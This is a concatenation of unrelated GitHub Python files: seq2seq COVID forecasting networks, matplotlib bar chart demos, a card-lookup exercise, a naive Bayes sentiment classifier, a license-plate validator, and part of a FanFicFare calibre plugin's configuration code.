            decoder = self.transformer.decoder

            # Encode the source sequence once; reuse the memory each step.
            enc_x = enc_x.unsqueeze(-1)
            enc_x = self.l1(enc_x)
            enc_x = self.positional_encoder(enc_x)
            enc_y = encoder(enc_x)

            for i in range(1, t_seq + 1):
                dec_x2 = dec_x.unsqueeze(-1)  # [N, i, 1]
                dec_x2 = self.l2(dec_x2)  # [N, i, d_model]
                dec_x2 = self.positional_encoder(dec_x2)  # [N, i, d_model]
                y = decoder(dec_x2, enc_y)  # [N, i, d_model]
                y = self.l3(y).squeeze(-1)  # [N, i]
                # Append only the newest prediction as the next input token.
                dec_x = torch.cat([dec_x, y[:, [-1]]], dim=-1)  # [N, i + 1]
        return dec_x[:, 1:]
class LSTMNet(nn.Module):
    """Seq2seq LSTM: the encoder consumes the source series, its final
    (hidden, cell) state seeds the decoder, and a linear head maps each
    decoder step back to a scalar."""

    def __init__(self, d_model=512, num_layers=1, dropout=0.1, bidirectional=False):
        super().__init__()
        self.l1 = nn.Linear(1, d_model)  # encoder input projection
        self.l2 = nn.Linear(1, d_model)  # decoder input projection
        lstm_kwargs = dict(dropout=dropout, bidirectional=bidirectional, batch_first=True)
        self.enc_lstm = nn.LSTM(d_model, d_model, num_layers, **lstm_kwargs)
        self.dec_lstm = nn.LSTM(d_model, d_model, num_layers, **lstm_kwargs)
        self.l3 = nn.Linear(2 * d_model, 1) if bidirectional else nn.Linear(d_model, 1)

    def forward(self, enc_x, dec_x):
        """Teacher-forced pass: [N, x_seq], [N, t_seq] -> [N, t_seq]."""
        encoded = self.l1(enc_x.unsqueeze(-1))  # [N, x_seq, d_model]
        _, state = self.enc_lstm(encoded)       # keep only final (h, c)
        decoded = self.l2(dec_x.unsqueeze(-1))  # [N, t_seq, d_model]
        out, _ = self.dec_lstm(decoded, state)  # [N, t_seq, d_model]
        return self.l3(out).squeeze(-1)         # [N, t_seq]

    def test(self, enc_x, dec_x, t_seq):
        """Autoregressive rollout: feed each prediction back as the next input."""
        preds = dec_x[:, [0]]  # [N, 1] seed token
        with torch.no_grad():
            encoded = self.l1(enc_x.unsqueeze(-1))
            _, state = self.enc_lstm(encoded)
            for _ in range(t_seq):
                step_in = self.l2(preds[:, [-1]].unsqueeze(-1))  # [N, 1, d_model]
                step_out, state = self.dec_lstm(step_in, state)  # carry (h, c)
                next_val = self.l3(step_out).squeeze(-1)         # [N, 1]
                preds = torch.cat([preds, next_val[:, [-1]]], dim=-1)
        return preds[:, 1:]
| yutotom/COVID-19-Forecasts | deep_learning/nets.py | nets.py | py | 4,463 | python | en | code | 0 | github-code | 36 |
16129130585 | # from pandas import *
# from pylab import *
# import numpy as np
# from matplotlib import pyplot as plt
# mpl.rcParams['font.sans-serif'] = ['SimHei'] # 加载中文字体的神奇呀
# idx = Index(np.arange(1,7))
# df = DataFrame(np.random.randn(6, 2), index=idx, columns=['', 'count'])
# valss = np.array([['总数', 100], ['嘿嘿', 10], ['流皮', '5']])
# vals = np.around(df.values,2)
# fig = plt.figure(figsize=(9,4))
# ax = fig.add_subplot(111, frameon=False, xticks=[], yticks=[]) # 去掉背景的意思嘛
# the_table=plt.table(cellText=valss, rowLabels=None, colLabels=['', 'count'],colWidths = [0.1]*vals.shape[1], loc='center',cellLoc='center')
# the_table.set_fontsize(20)
# the_table.scale(2.5,2.58)
# plt.show() # todo 画表格的
# import numpy as np
# import matplotlib.pyplot as plt
# men_means, men_std = (20, 35, 30, 35, 27), (0, 3, 4, 1, 2)
# women_means, women_std = (25, 32, 34, 20, 25), (3, 5, 2, 3, 3)
# ind = np.arange(len(men_means)) # the x locations for the groups
# width = 0.35 # the width of the bars
# fig, ax = plt.subplots()
# rects1 = ax.bar(ind - width/2, men_means, width,
# color='SkyBlue', label='Men')
# rects2 = ax.bar(ind + width/2, women_means, width,
# color='IndianRed', label='Women')
# ax.set_ylabel('Scores')
# ax.set_title('Scores by group and gender')
# ax.set_xticks(ind)
# ax.set_xticklabels(('G1', 'G2', 'G3', 'G4', 'G5'))
# ax.legend()
# def autolabel(rects, xpos='center'):
# xpos = xpos.lower() # normalize the case of the parameter
# ha = {'center': 'center', 'right': 'left', 'left': 'right'}
# offset = {'center': 0.5, 'right': 0.57, 'left': 0.43} # x_txt = x + w*off
#
# for rect in rects:
# height = rect.get_height()
# ax.text(rect.get_x() + rect.get_width()*offset[xpos], 1.01*height,
# '{}'.format(height), ha=ha[xpos], va='bottom')
# autolabel(rects1, "left")
# autolabel(rects2, "right")
# plt.show() # todo 画柱形图的
# import numpy as np
# import matplotlib
# import matplotlib.pyplot as plt
# sphinx_gallery_thumbnail_number = 2
# vegetables = ["cucumber", "tomato", "lettuce", "asparagus",
# "potato", "wheat", "barley"]
# vegetables1 = [" ", " ", " ", " ",
# " ", " ", " "]
# vegetables2 = ["a", "asd", "asd", "asd",
# "zxc", "asd", "qwe"]
# farmers = ["Farmer Joe", "Upland Bros.", "Smith Gardening",
# "Agrifun", "Organiculture", "BioGoods Ltd.", "Cornylee Corp."]
# harvest = np.array([[0.8, 2.4, 2.5, 3.9, 0.0, 4.0, 0.0],
# [2.4, 0.0, 4.0, 1.0, 2.7, 0.0, 0.0],
# [1.1, 2.4, 0.8, 4.3, 1.9, 4.4, 0.0],
# [0.6, 0.0, 0.3, 0.0, 3.1, 0.0, 0.0],
# [0.7, 1.7, 0.6, 2.6, 2.2, 6.2, 0.0],
# [1.3, 1.2, 0.0, 0.0, 0.0, 3.2, 5.1],
# [0.1, 2.0, 0.0, 1.4, 0.0, 1.9, 6.3]])
# fig, ax = plt.subplots()
# im = ax.imshow(harvest)
# ax.set_xticks(np.arange(len(farmers)))
# ax.set_xticks(np.arange(len(farmers)+1)-.5, minor=True)
# ax.set_xticklabels(farmers)
# ax.set_yticks(np.arange(len(vegetables)))
# ax.set_yticks(np.arange(len(vegetables)+1)-.5, minor=True)
# # ax.set_yticklabels(['' for _ in range(len(vegetables))])
# ax.set_yticklabels(vegetables)
# # ... and label them with the respective list entries
# # ax.set_yticklabels([1,2,3,4,5,6,7])
# # ax.set_yticklabels([str(i) for i in range(len(vegetables))])
# ax.grid(which="minor", color="w", linestyle='-', linewidth=0)
# # Rotate the tick labels and set their alignment.
# plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
# rotation_mode="anchor")
# # Loop over data dimensions and create text annotations.
# for i in range(len(vegetables)):
# for j in range(len(farmers)):
# text = ax.text(j, i, harvest[i, j],
# ha="center", va="center", color="w")
# ax.set_title("Harvest of local farmers (in tons/year)")
# fig.tight_layout()
# plt.show()
# import matplotlib.pyplot as plt
# def make_patch_spines_invisible(ax):
# ax.set_frame_on(True)
# ax.patch.set_visible(False)
# for sp in ax.spines.values():
# sp.set_visible(False)
# fig, host = plt.subplots()
# # fig.subplots_adjust(right=0.75)
# par1 = host.twinx()
# par2 = host.twinx()
# # Offset the right spine of par2. The ticks and label have already been
# # placed on the right by twinx above.
# par2.spines["right"].set_position(("axes", 1.2))
# # Having been created by twinx, par2 has its frame off, so the line of its
# # detached spine is invisible. First, activate the frame but make the patch
# # and spines invisible.
# make_patch_spines_invisible(par2)
# # Second, show the right spine.
# par2.spines["right"].set_visible(True)
# p1, = host.plot([0, 1, 2], [0, 1, 2], "b-", label="Density")
# p2, = par1.plot([0, 1, 2], [0, 3, 2], "r-", label="Temperature")
# p3, = par2.plot([0, 1, 2], [50, 30, 15], "g-", label="Velocity")
# host.set_xlim(0, 2)
# host.set_ylim(0, 2)
# par1.set_ylim(0, 4)
# par2.set_ylim(1, 65)
# host.set_xlabel("Distance")
# host.set_ylabel("Density")
# par1.set_ylabel("Temperature")
# par2.set_ylabel("Velocity")
# host.yaxis.label.set_color(p1.get_color())
# par1.yaxis.label.set_color(p2.get_color())
# par2.yaxis.label.set_color(p3.get_color())
# tkw = dict(size=4, width=1.5)
# host.tick_params(axis='y', colors=p1.get_color(), **tkw)
# par1.tick_params(axis='y', colors=p2.get_color(), **tkw)
# par2.tick_params(axis='y', colors=p3.get_color(), **tkw)
# host.tick_params(axis='x', **tkw)
# lines = [p1, p2, p3]
# host.legend(lines, [l.get_label() for l in lines])
# plt.show()
import numpy as np
import matplotlib.pyplot as plt
# Demo 1: grouped horizontal bar chart with three series per category.
# NOTE: the *_std tuples are defined but never used below.
men_means, men_std = (20, 35, 30, 35, 27), (2, 3, 4, 1, 2)
women_means, women_std = (25, 32, 34, 20, 25), (3, 5, 2, 3, 3)
midde_means, midde_std = (25, 32, 34, 20, 25), (3, 5, 2, 3, 3)
ind = np.arange(len(men_means))  # the x locations for the groups
width = 0.2  # the width of the bars
fig, ax = plt.subplots()
# Three bar series offset vertically so they sit side by side per group.
rects1 = ax.barh(ind - width/2, men_means, width,
                color='SkyBlue', label='Men')
rects2 = ax.barh(ind + width/2, women_means, width,
                color='r', label='Women')
rects3 = ax.barh(ind + width/2 + width, midde_means, width,
                color='IndianRed', label='midde')
ax.set_ylabel('Scores')
ax.set_title('Scores by group and gender')
ax.set_yticks(ind)
ax.set_yticklabels(('G1', 'G2', 'G3', 'G4', 'G5'))
ax.legend()
def autolabel(rects, xpos='center'):
    """Annotate each horizontal bar in *rects* with its width (its value).

    xpos: 'center', 'right' or 'left' -- controls the text anchor relative
    to the bar end.  The previous version labelled every bar with the
    hard-coded placeholder 111 and never used the computed alignment.
    """
    xpos = xpos.lower()  # normalize the case of the parameter
    ha = {'center': 'center', 'right': 'left', 'left': 'right'}

    for rect in rects:
        width = rect.get_width()
        ax.text(1.01 * width, rect.get_y(), '{}'.format(width),
                ha=ha[xpos], va='bottom')
# Collect the per-bar .get_height() of each series into numpy arrays.
# NOTE(review): the list iterates [rects1, rects2, rects2] -- rects3 was
# probably intended; the collected values are also never used afterwards.
rects1_values = []
for rects in [rects1, rects2, rects2]:
    _rects1_values = []
    for rect in rects:
        _rects1_values.append(rect.get_height())
    rects1_values.append(np.array(_rects1_values))
# Label all three bar series, then render the figure.
autolabel(rects1, "center")
autolabel(rects2, "center")
autolabel(rects3, "center")
plt.show()
# Demo 2: second, independent horizontal bar example (re-imports shadow the
# ones above; rcdefaults() resets any style changes made so far).
import matplotlib.pyplot as plt
import numpy as np
np.random.seed(19680801)  # fixed seed so the random bar data is reproducible
width = 0.2
plt.rcdefaults()
fig, ax = plt.subplots()
people = ('Tom', 'Dick', 'Harry', 'Slim', 'Jim')
y_pos = np.arange(len(people))
performance = 3 + 10 * np.random.rand(len(people))
error = np.random.rand(len(people))
# Two bars per person drawn from the same data, offset above/below the tick.
ax.barh(y_pos - width/2, performance, width, xerr=error, align='center',
        color='green', ecolor='black')
ax.barh(y_pos + width/2, performance, width, xerr=error, align='center',
        color='red', ecolor='black')
print(y_pos, people)
ax.set_yticks(y_pos)
ax.set_yticklabels(people)
ax.invert_yaxis()  # labels read top-to-bottom
ax.set_xlabel('Performance')
ax.set_title('How fast do you want to go today?')
plt.show()
| czasg/ScrapyLearning | czaSpider/dump2/数据分析个人版/诚信数据咯/画图抱佛脚.py | 画图抱佛脚.py | py | 7,890 | python | en | code | 1 | github-code | 36 |
## (Solved, but resubmitted because the answer resembled a friend's -- this
## replaces the earlier version that exceeded the time limit.)
import sys
input = sys.stdin.readline

n = int(input())
n_num = list(map(int, input().split()))
m = int(input())
m_num = list(map(int, input().split()))

# The previous version tested membership against a *list*, making each query
# O(len(list)) and causing the time-limit failure; a set gives O(1) lookups.
owned = set(n_num)
result = [1 if card in owned else 0 for card in m_num]
print(*result)
| papillonthor/Cool_Hot_ALGO | hcCha/s5_10815_숫자카드.py | s5_10815_숫자카드.py | py | 408 | python | ko | code | 2 | github-code | 36 |
5356541322 | import sys
import re
import random
"""This method is used to split the data into training and testing dataset.
It takes 2 parameters i.e a 2D array containing sentences along with their labels and factor which is the split factor.
The split factor tells in what ratio we need to divide the testing and training data. It returns 2 arrays, i.e a Training and a Testing
dataset."""
def Split_Data(sentiments,factor):
split_factor = factor
Sample_Data = [i for i in range(len(sentiments))]
#Using random function, we select random data from sentiments array to add to training data.
Training = random.sample(range(0, len(sentiments)), int(split_factor * len(sentiments)))
Training = list(set(Training))
Testing = list(set(Sample_Data).difference(Training)) #This makes sure that Training and testing data are mutually exclusive.
Testing_Data = []
Training_Data = []
for i in range(len(Training)):
Training_Data.append(sentiments[Training[i]])
for i in range(len(Testing)):
Testing_Data.append(sentiments[Testing[i]])
return Training_Data, Testing_Data
"""This method is used to calculate Accuracy, Precision, Recall and F1 Score.
It takes 4 inputs i.e frequency of True Positives,True Negatives, False Positives and False Negatives."""
def Calculate_Score(True_Positive,True_Negative,False_Positive,False_Negative):
Accuracy=(float(True_Negative+True_Positive))/(True_Negative+True_Positive+False_Negative+False_Positive)
Precision=(float(True_Positive))/(True_Positive+False_Positive)
Recall=(float(True_Positive))/(True_Positive+False_Negative)
F1_Score=2*(Precision*Recall)/(Precision+Recall)
print("Accuracy is "+str(Accuracy))
print("Precision is "+str(Precision))
print("Recall is "+str(Recall))
print("F1 Score is "+str(F1_Score))
"""This method is used to get the count of number of words in Positive and Negative sentences respectively."""
def Get_Count(TRAINING_DATA):
Number_of_Positive = 0
Number_of_Negatives = 0
for i in range(len(TRAINING_DATA)):
if TRAINING_DATA[i][0] == 'pos':# If the label is positive,get the count of number of words in that sentence.
Number_of_Positive += (len(TRAINING_DATA[i]) - 1)
else:
Number_of_Negatives += (len(TRAINING_DATA[i]) - 1) #If label is negative, store count of number of words in that sentence.
return Number_of_Positive,Number_of_Negatives
"""This method is used to generate the confusion matrix for the Testing Data.
It takes Testing Data which is a 2D array as input and returns the values of the cells in
a confusion matrix"""
def Confusion_Matrix(TESTING_DATA):
    """Classify each test sentence with naive Bayes, then print and score
    the resulting confusion matrix.

    Relies on module-level globals built at import time: positive_words,
    negative_words, bag_of_words, Number_of_Positive, Number_of_Negatives
    and the class priors pos / neg.
    """
    True_Positive = 0
    True_Negative = 0
    False_Positive = 0
    False_Negative = 0
    for x in range(len(TESTING_DATA)):
        words = TESTING_DATA[x]
        POS = 1
        NEG = 1
        POSITIVE_OCCURENCES = 0
        NEGATIVE_OCCURENCES = 0
        # NOTE(review): the *_OCCURENCES variables are only reassigned when a
        # word is found in the corresponding dict, so a word absent from one
        # dict silently reuses the previous word's count -- verify intended.
        # Also note the first `continue` skips the negative lookup entirely
        # for low-frequency positive words.
        for i in range(1, len(words)):
            if words[i] in positive_words:
                POSITIVE_OCCURENCES = positive_words[(words[i]).lower()]
                if POSITIVE_OCCURENCES<=50: #Don't consider a word if its occuring less than or equal to 50 times.
                    continue
            if words[i] in negative_words:
                NEGATIVE_OCCURENCES = negative_words[(words[i]).lower()]
                if NEGATIVE_OCCURENCES<=50: #Don't consider a word if its occuring less than or equal to 50 times.
                    continue
            # Laplace-smoothed per-word likelihoods for each class.
            POS *= (float(POSITIVE_OCCURENCES + 1)) / (len(bag_of_words) + Number_of_Positive)
            NEG *= (float(NEGATIVE_OCCURENCES + 1)) / (len(bag_of_words) + Number_of_Negatives)
        POS=pos*POS #POS multiplied by the probability of positive i.e pos
        NEG=neg*NEG #NEG multiplied by the probability of negative i.e neg
        if (POS>NEG):
            Predicted = 'pos'
        else:
            Predicted = 'neg'
        Actual = words[0] #The first word gives the label i.e positive or negative
        if Predicted == 'pos' and Actual == 'pos':
            True_Positive += 1
        elif Predicted == 'pos' and Actual == 'neg':
            False_Positive += 1
        elif Predicted == 'neg' and Actual == 'pos':
            False_Negative += 1
        elif Predicted == 'neg' and Actual == 'neg':
            True_Negative += 1
    print("True Positives = "+str(True_Positive))
    print("True Negatives = "+str(True_Negative))
    print("False Positives = "+str(False_Positive))
    print("False Negatives = "+str(False_Negative))
    Calculate_Score(True_Positive,True_Negative,False_Positive,False_Negative)
"""This method id used to get the data from a text file and store it into a 2D array. It also counts
the number of positive and negative examples. Also, we have a dictionary named bag_of_words for storing
all the unique words present in the document."""
def Get_Input(path):
    """Read the labelled corpus at *path* and build the model's raw counts.

    Each input line is split on the delimiter set; index 1 holds the label
    ('pos'/'neg') and indices 4+ hold the sentence words.

    Returns
    -------
    (sentiments, POSITIVE_WORDS, NEGATIVE_WORDS, bag_of_words, pos, neg)
        Sentences with labels, per-class word counts (words occurring more
        than 10 times), the unique-word dict, and the class example counts.
    """
    delimeter = ",|-| |;|\.|\(|\)|\n|\"|:|'|/|&|`|[|]|\{|\}"
    bag_of_words = {}
    negative_words = {}
    positive_words = {}
    sentiments = []
    pos = 0
    neg = 0
    with open(path, encoding="utf8") as f:
        for line in f:
            words = re.split(delimeter, line) #Split a sentence into array of words
            if words[1] == 'neg':
                neg += 1 #Counting number of negative examples
                for i in range(4, len(words)):
                    if words[i] not in negative_words:
                        negative_words[words[i]] = 1
                    else:
                        negative_words[words[i]] += 1
            elif words[1] == 'pos':
                pos += 1#Counting number f positive examples
                for i in range(4, len(words)):
                    if words[i] not in positive_words:
                        positive_words[words[i]] = 1
                    else:
                        positive_words[words[i]] += 1
            temp = [words[1]] # Storing sentences along with their labels
            for i in range(4, len(words)):
                if len(words[i]) != 0:
                    temp += [(words[i]).lower()]
            sentiments.append(temp)
        # NOTE(review): the two loops below sit outside the per-line loop, so
        # bag_of_words is populated only from the *last* line of the file --
        # the comment below claims it covers the whole doc; verify intended.
        for i in range(4): #Removing file name, format, and label.
            words.pop(0)
        for i in range(len(words)):
            if len(words[i]) != 0:
                bag_of_words[(words[i]).lower()] = 1 #Putting words in bag_of_words. It contains the number of unique words in the doc.
    # Keep only words seen more than 10 times in each class.
    POSITIVE_WORDS={}
    for i in positive_words:
        if positive_words[i]<=10: #Remove less frequent words
            continue
        else:
            POSITIVE_WORDS[i]=positive_words[i]
    NEGATIVE_WORDS={}
    for i in negative_words:
        if negative_words[i]<=10: #Remove less frequent words
            continue
        else:
            NEGATIVE_WORDS[i]=negative_words[i]
    return sentiments,POSITIVE_WORDS,NEGATIVE_WORDS,bag_of_words,pos,neg
# Script body (runs at import time): load the corpus, split it, then evaluate.
#Read and store necessary information from the text file given as input data.
sentiments,positive_words,negative_words,bag_of_words,pos,neg = Get_Input('naive_bayes_data.txt')
#Split the 2D array data i.e sentiments array into 2 sets i.e training and testing data and specify the split_factor
TRAINING_DATA, TESTING_DATA = Split_Data(sentiments,0.8)
#Get the count of number of positive and negative words
Number_of_Positive,Number_of_Negatives=Get_Count(TRAINING_DATA)
#Generate the confusion matrix
Confusion_Matrix(TESTING_DATA)
| f2015712/Sentiment-Analysis-using-Naive-Bayes | naive_bayes.py | naive_bayes.py | py | 7,673 | python | en | code | 0 | github-code | 36 |
def main():
    """Prompt for a plate string and report whether it is a valid plate."""
    plate = input("Plate: ")
    print("Valid" if is_valid(plate) else "Invalid")
def is_valid(s):
    """Return True when *s* is a valid vanity plate, False otherwise.

    Rules: 2-6 characters, starts with at least two letters, no special
    characters, digits only at the end, and the first digit used is not 0.

    The previous chained comparison `6 <= len(s) >= 2` required len >= 6,
    rejecting every 2-5 character plate; it also fell through to an implicit
    None (falsy) when the length check failed.
    """
    if not 2 <= len(s) <= 6:
        return False
    return (is_nospecial(s) and start_letters(s)
            and first_num(s) and last_in_digit(s))
# no special characters Eg. Hello, -> cant have ","
def is_nospecial(x):
special_char = "'[@_!.,#$%^&*()<>?/\|}{~:]'"
if any(i in special_char for i in x):
return False
else:
return True
# Must start at least with 2 letter Eg. AA4554, ASD457, BB1111
def start_letters(x):
a = x[0]
b = x[1]
if a.isalpha() == True and b.isalpha() == True:
return True
else:
return False
# The first number used cant be a 0 Eg. CS050 -> cant be "0"
def first_num(x):
safe = ''
x = string_list(x)
for i in x:
if i.isdigit():
safe += i
break
if safe.isdigit():
if safe == '0':
return False
else:
return True
else:
return True
def string_list(x):
    """Return the characters of x as a list."""
    chars = []
    chars.extend(x)
    return chars
# numbers cant be in the middle of letters must be at the end Eg. AAA124
def last_in_digit(x):
y = len(x)
y -= 1
check = x[y]
for i in x:
if check.isdigit():
return True
elif x.isalpha():
return True
else:
return False
main()  # script entry point (CS50 style: called unconditionally)
38665711112 | # -*- coding: utf-8 -*-
from __future__ import (unicode_literals, division, absolute_import,
print_function)
import six
__license__ = 'GPL v3'
__copyright__ = '2021, Jim Miller'
__docformat__ = 'restructuredtext en'
import logging
logger = logging.getLogger(__name__)
import re
import threading
from collections import OrderedDict
from PyQt5 import QtWidgets as QtGui
from PyQt5.Qt import (QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QLabel,
QLineEdit, QComboBox, QCheckBox, QPushButton, QTabWidget,
QScrollArea, QGroupBox, QButtonGroup, QRadioButton,
Qt)
from calibre.gui2 import dynamic, info_dialog
from calibre.gui2.complete2 import EditWithComplete
from calibre.gui2.dialogs.confirm_delete import confirm
from fanficfare.six import text_type as unicode
# Probe for calibre's built-in cover generator (added in newer calibre
# releases); HAS_CALGC gates the "calibre Generate Cover" feature later.
try:
    from calibre.ebooks.covers import generate_cover as cal_generate_cover
    HAS_CALGC=True
except:
    # NOTE(review): bare except also hides unrelated errors, not just the
    # missing module on old calibre versions -- verify before narrowing.
    HAS_CALGC=False

# pulls in translation files for _() strings
try:
    load_translations()
except NameError:
    pass # load_translations() added in calibre 1.9
from calibre.library.field_metadata import FieldMetadata
# Fresh FieldMetadata instance: used to enumerate calibre's standard columns.
field_metadata = FieldMetadata()

# There are a number of things used several times that shouldn't be
# translated.  This is just a way to make that easier by keeping them
# out of the _() strings.
# I'm tempted to override _() to include them...
no_trans = { 'pini':'personal.ini',
             'gcset':'generate_cover_settings',
             'ccset':'custom_columns_settings',
             'gc':'Generate Cover',
             'rl':'Reading List',
             'cp':'Count Pages',
             'cmplt':'Completed',
             'inprog':'In-Progress',
             'lul':'Last Updated',
             'lus':'lastupdate',
             'is':'include_subject',
             'isa':'is_adult',
             'u':'username',
             'p':'password',
             }

# Standard calibre columns the custom-columns config UI should never offer.
STD_COLS_SKIP = ['size','cover','news','ondevice','path','series_sort','sort']
from calibre_plugins.fanficfare_plugin.prefs import (
prefs, rejects_data, PREFS_NAMESPACE, prefs_save_options,
updatecalcover_order, gencalcover_order, do_wordcount_order,
SAVE_YES, SAVE_NO)
from calibre_plugins.fanficfare_plugin.dialogs import (
UPDATE, UPDATEALWAYS, collision_order, save_collisions, RejectListDialog,
EditTextDialog, IniTextDialog, RejectUrlEntry)
from fanficfare.adapters import getSiteSections, get_section_url
from calibre_plugins.fanficfare_plugin.common_utils import (
KeyboardConfigDialog, PrefsViewerDialog, busy_cursor )
class RejectURLList:
    """Thread-safe store of story URLs the user has rejected.

    Note that RejectURLList applies adapters.get_section_url(url) to
    all urls before caching and before checking so
    ffnet/a/123/1/Title -> ffnet/a/123/1/, xenforo too.  The saved
    list still contains the full URL so we're not destroying any
    data.  Could have duplicates, though.
    """
    def __init__(self, prefs, rejects_data):
        self.prefs = prefs
        self.rejects_data = rejects_data
        # Guards the lazy cache -- reject checks can come from
        # background download jobs as well as the config GUI.
        self.sync_lock = threading.RLock()
        # OrderedDict of section URL -> RejectUrlEntry, built lazily
        # by _get_listcache().
        self.listcache = None

    def _read_list_from_text(self, text, addreasontext='', normalize=True):
        """Parse one RejectUrlEntry per line of text; invalid lines are skipped."""
        cache = OrderedDict()
        for line in text.splitlines():
            rue = RejectUrlEntry(line, addreasontext=addreasontext,
                                 fromline=True, normalize=normalize)
            if rue.valid:
                cache[get_section_url(rue.url)] = rue
        return cache

    def _get_listcache(self):
        """Return the section-URL keyed cache, loading it from saved data
        on first use.  Callers are expected to hold self.sync_lock."""
        with busy_cursor():
            # FIX: was 'self.listcache == None'; identity comparison is
            # the correct test for None.
            if self.listcache is None:
                if tuple(self.prefs['last_saved_version']) > (3, 1, 7) and \
                        self.rejects_data['rejecturls_data']:
                    # Versions after 3.1.7 save structured records in
                    # rejects_data rather than a text blob in prefs.
                    self.listcache = OrderedDict()
                    for x in self.rejects_data['rejecturls_data']:
                        rue = RejectUrlEntry.from_data(x)
                        if rue.valid:
                            section_url = get_section_url(rue.url)
                            if section_url in self.listcache:
                                logger.debug("Duplicate in Reject list: %s %s (use longer)"%(
                                        self.listcache[section_url].url, rue.url))
                            ## if there's a dup, keep the one with the
                            ## longer URL, more likely to be titled
                            ## version.
                            if( section_url not in self.listcache
                                or len(rue.url) > len(self.listcache[section_url].url) ):
                                self.listcache[section_url] = rue
                else:
                    # Assume saved rejects list is already normalized after
                    # v2.10.9. If normalization needs to change someday, can
                    # increase this to do it again.
                    normalize = tuple(self.prefs['last_saved_version']) < (2, 10, 9)
                    self.listcache = self._read_list_from_text(self.prefs['rejecturls'],
                                                               normalize=normalize)
                    if normalize:
                        self._save_list(self.listcache, clearcache=False)
            return self.listcache

    def _save_list(self, listcache, clearcache=True):
        """Persist listcache to the database; optionally drop the cache so
        it is re-read on next access."""
        with busy_cursor():
            ## As of July 2020 it's been > 1.5 years since
            ## rejects_data added. Stop keeping older version in
            ## prefs.
            del self.prefs['rejecturls']
            self.prefs.save_to_db()
            rejects_data['rejecturls_data'] = [x.to_data() for x in listcache.values()]
            rejects_data.save_to_db()
            if clearcache:
                self.listcache = None

    def clear_cache(self):
        """Force a reload from saved data on the next access."""
        self.listcache = None

    # true if url is in list.
    def check(self, url):
        url = get_section_url(url)
        with self.sync_lock:
            listcache = self._get_listcache()
            return url in listcache

    def get_note(self, url):
        """Return the short note for url, or '' if url isn't rejected."""
        url = get_section_url(url)
        with self.sync_lock:
            listcache = self._get_listcache()
            if url in listcache:
                return listcache[url].note
            # not found
            return ''

    def get_full_note(self, url):
        """Return the full note for url, or '' if url isn't rejected."""
        url = get_section_url(url)
        with self.sync_lock:
            listcache = self._get_listcache()
            if url in listcache:
                return listcache[url].fullnote()
            # not found
            return ''

    def remove(self, url):
        """Remove url from the reject list (no-op if absent) and save."""
        url = get_section_url(url)
        with self.sync_lock:
            listcache = self._get_listcache()
            if url in listcache:
                del listcache[url]
                self._save_list(listcache)

    def add_text(self, rejecttext, addreasontext):
        """Add rejects from raw text, one 'URL[,note]' per line."""
        self.add(list(self._read_list_from_text(rejecttext, addreasontext).values()))

    def add(self, rejectlist, clear=False):
        """Merge a list of RejectUrlEntry into the saved list; with
        clear=True the saved list is replaced instead of merged."""
        with self.sync_lock:
            if clear:
                listcache = OrderedDict()
            else:
                listcache = self._get_listcache()
            for l in rejectlist:
                listcache[get_section_url(l.url)] = l
            self._save_list(listcache)

    def get_list(self):
        return list(self._get_listcache().values())

    def get_reject_reasons(self):
        return self.prefs['rejectreasons'].splitlines()
rejecturllist = RejectURLList(prefs,rejects_data)
class ConfigWidget(QWidget):
    """Top-level widget shown in calibre's plugin Customize dialog.

    __init__ builds one tab per feature area inside a scroll area;
    save_settings() copies every widget's state back into prefs in a
    single pass and persists to the database.
    """
    def __init__(self, plugin_action):
        QWidget.__init__(self)
        self.plugin_action = plugin_action

        self.l = QVBoxLayout()
        self.setLayout(self.l)

        label = QLabel('<a href="'\
                       +'https://github.com/JimmXinu/FanFicFare/wiki/Supportedsites">'\
                       +_('List of Supported Sites')+'</a> -- <a href="'\
                       +'https://github.com/JimmXinu/FanFicFare/wiki/FAQs">'\
                       +_('FAQs')+'</a>')
        label.setOpenExternalLinks(True)
        self.l.addWidget(label)

        self.scroll_area = QScrollArea(self)
        self.scroll_area.setFrameShape(QScrollArea.NoFrame)
        self.scroll_area.setWidgetResizable(True)
        self.l.addWidget(self.scroll_area)

        tab_widget = QTabWidget(self)
        self.scroll_area.setWidget(tab_widget)

        self.basic_tab = BasicTab(self, plugin_action)
        tab_widget.addTab(self.basic_tab, _('Basic'))

        self.personalini_tab = PersonalIniTab(self, plugin_action)
        tab_widget.addTab(self.personalini_tab, 'personal.ini')

        self.readinglist_tab = ReadingListTab(self, plugin_action)
        tab_widget.addTab(self.readinglist_tab, 'Reading Lists')
        # Reading List integration is only usable when that plugin is
        # installed (registered in gui.iactions).
        if 'Reading List' not in plugin_action.gui.iactions:
            self.readinglist_tab.setEnabled(False)

        self.calibrecover_tab = CalibreCoverTab(self, plugin_action)
        tab_widget.addTab(self.calibrecover_tab, _('Calibre Cover'))

        self.countpages_tab = CountPagesTab(self, plugin_action)
        tab_widget.addTab(self.countpages_tab, 'Count Pages')
        # Likewise, Count Pages integration needs that plugin installed.
        if 'Count Pages' not in plugin_action.gui.iactions:
            self.countpages_tab.setEnabled(False)

        self.std_columns_tab = StandardColumnsTab(self, plugin_action)
        tab_widget.addTab(self.std_columns_tab, _('Standard Columns'))

        self.cust_columns_tab = CustomColumnsTab(self, plugin_action)
        tab_widget.addTab(self.cust_columns_tab, _('Custom Columns'))

        self.imap_tab = ImapTab(self, plugin_action)
        tab_widget.addTab(self.imap_tab, _('Email Settings'))

        self.other_tab = OtherTab(self, plugin_action)
        tab_widget.addTab(self.other_tab, _('Other'))

    def save_settings(self):
        """Copy widget states from every tab back into prefs and persist.

        Each assignment below is tied to a specific prefs key read
        elsewhere in the plugin -- keep keys and widget names in sync
        with the tab classes.
        """
        with busy_cursor():

            # basic
            prefs['fileform'] = unicode(self.basic_tab.fileform.currentText())
            prefs['collision'] = save_collisions[unicode(self.basic_tab.collision.currentText())]
            prefs['updatemeta'] = self.basic_tab.updatemeta.isChecked()
            prefs['bgmeta'] = self.basic_tab.bgmeta.isChecked()
            prefs['keeptags'] = self.basic_tab.keeptags.isChecked()
            prefs['mark'] = self.basic_tab.mark.isChecked()
            prefs['mark_success'] = self.basic_tab.mark_success.isChecked()
            prefs['mark_failed'] = self.basic_tab.mark_failed.isChecked()
            prefs['mark_chapter_error'] = self.basic_tab.mark_chapter_error.isChecked()
            prefs['showmarked'] = self.basic_tab.showmarked.isChecked()
            prefs['autoconvert'] = self.basic_tab.autoconvert.isChecked()
            prefs['show_est_time'] = self.basic_tab.show_est_time.isChecked()
            prefs['urlsfromclip'] = self.basic_tab.urlsfromclip.isChecked()
